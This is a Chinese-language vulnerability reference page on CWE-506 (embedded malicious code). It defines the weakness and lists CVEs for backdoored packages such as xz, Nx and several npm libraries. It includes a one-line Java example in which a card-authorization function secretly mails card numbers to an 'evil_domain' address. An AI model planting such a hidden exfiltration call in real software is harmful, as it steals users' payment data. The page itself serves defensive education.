CWE-506 内嵌的恶意代码 类弱点 97 条 CVE 漏洞汇总,含 AI 中文分析。
CWE-506指嵌入式恶意代码,属于软件内部植入的隐蔽后门或逻辑炸弹。攻击者通常利用开发者故意插入的代码,在特定条件触发时窃取数据或破坏系统,从而绕过正常安全机制。开发者应通过严格的代码审查、静态分析工具检测异常逻辑,并实施最小权限原则,确保代码来源可信且无未授权的后门植入,以从根本上杜绝此类内部威胁。
boolean authorizeCard(String ccn) { // Authorize credit card. ... mailCardNumber(ccn, "evil_developer@evil_domain.com"); }
| CVE ID | 标题 | CVSS | 风险等级 | Published |
|---|---|---|---|---|
| CVE-2025-10894 | Nx 安全漏洞 | 9.6 | Critical | 2025-09-24 |
| CVE-2025-59145 | color-name 安全漏洞 — color-name | 6.1AI | Medium AI | 2025-09-15 |
| CVE-2025-59331 | node-is-arrayish 安全漏洞 — node-is-arrayish | 8.2AI | High AI | 2025-09-15 |
| CVE-2025-59330 | node-error-ex 安全漏洞 — node-error-ex | 8.2AI | High AI | 2025-09-15 |
| CVE-2025-59162 | color-convert 安全漏洞 — color-convert | 5.4AI | Medium AI | 2025-09-15 |
| CVE-2025-59142 | Color-String 安全漏洞 — color-string | 8.2AI | High AI | 2025-09-15 |
| CVE-2025-59144 | debug 安全漏洞 — debug | 6.1AI | Medium AI | 2025-09-15 |
| CVE-2025-59143 | color 安全漏洞 — color | 6.1AI | Medium AI | 2025-09-15 |
| CVE-2025-59141 | simple-swizzle 安全漏洞 — node-simple-swizzle | 6.1AI | Medium AI | 2025-09-15 |
| CVE-2025-59140 | Backslash 安全漏洞 — node-backslash | 6.1AI | Medium AI | 2025-09-15 |
| CVE-2025-59039 | Prebid Universal Creative 安全漏洞 — prebid-universal-creative | 9.8AI | Critical AI | 2025-09-09 |
| CVE-2025-59038 | Prebid.js 安全漏洞 — Prebid.js | 8.2AI | High AI | 2025-09-09 |
| CVE-2025-59037 | DuckDB 安全漏洞 — duckdb-node | 9.1AI | Critical AI | 2025-09-09 |
| CVE-2025-8217 | Amazon Q Developer Visual Studio Code extension 安全漏洞 — Q Developer VS Code Extension | 4.0 | Medium | 2025-07-30 |
| CVE-2025-54313 | eslint-config-prettier 安全漏洞 — eslint-config-prettier | 7.5 | High | 2025-07-19 |
| CVE-2025-32965 | xrpl.js 安全漏洞 — xrpl.js | 7.5 | - | 2025-04-22 |
| CVE-2025-30154 | Reviewdog 安全漏洞 — reviewdog | 8.6 | High | 2025-03-19 |
| CVE-2025-30066 | changed-files 安全漏洞 — changed-files | 8.6 | High | 2025-03-15 |
| CVE-2024-4978 | Justice AV Solutions Viewer 安全漏洞 — Viewer | 8.4 | High | 2024-05-23 |
| CVE-2024-3094 | xz 安全漏洞 | 10.0 | Critical | 2024-03-29 |
| CVE-2023-2003 | Unitronics Vision1210 安全漏洞 — Vision1210 | 9.1 | Critical | 2023-07-13 |
| CVE-2021-22887 | Pulse Secure PSA5000 and PSA7000 安全漏洞 — PSA5000, PSA7000 | 5.7 | - | 2021-03-16 |
| CVE-2020-15165 | Chameleon Mini Live Debugger 安全漏洞 — ChameleonMiniLiveDebugger | 9.3 | Critical | 2020-08-28 |
| CVE-2017-16072 | nodemailer.js 安全漏洞 — nodemailer.js node module | 7.5 | - | 2018-06-07 |
| CVE-2017-16068 | ffmepg 安全漏洞 — ffmepg node module | 7.5 | - | 2018-06-07 |
| CVE-2017-16071 | nodemailer.js 安全漏洞 — nodemailer-js node module | 7.5 | - | 2018-06-07 |
| CVE-2017-16070 | nodecaffe 安全漏洞 — nodecaffe node module | 7.5 | - | 2018-06-07 |
| CVE-2017-16069 | nodeffmpeg 安全漏洞 — nodeffmpeg node module | 7.5 | - | 2018-06-07 |
| CVE-2017-16067 | node-opencv 安全漏洞 — node-opencv node module | 7.5 | - | 2018-06-07 |
| CVE-2017-16066 | opencv.js 安全漏洞 — opencv.js node module | 7.5 | - | 2018-06-07 |
CWE-506(内嵌的恶意代码) 是常见的弱点类别,本平台收录该类弱点关联的 97 条 CVE 漏洞。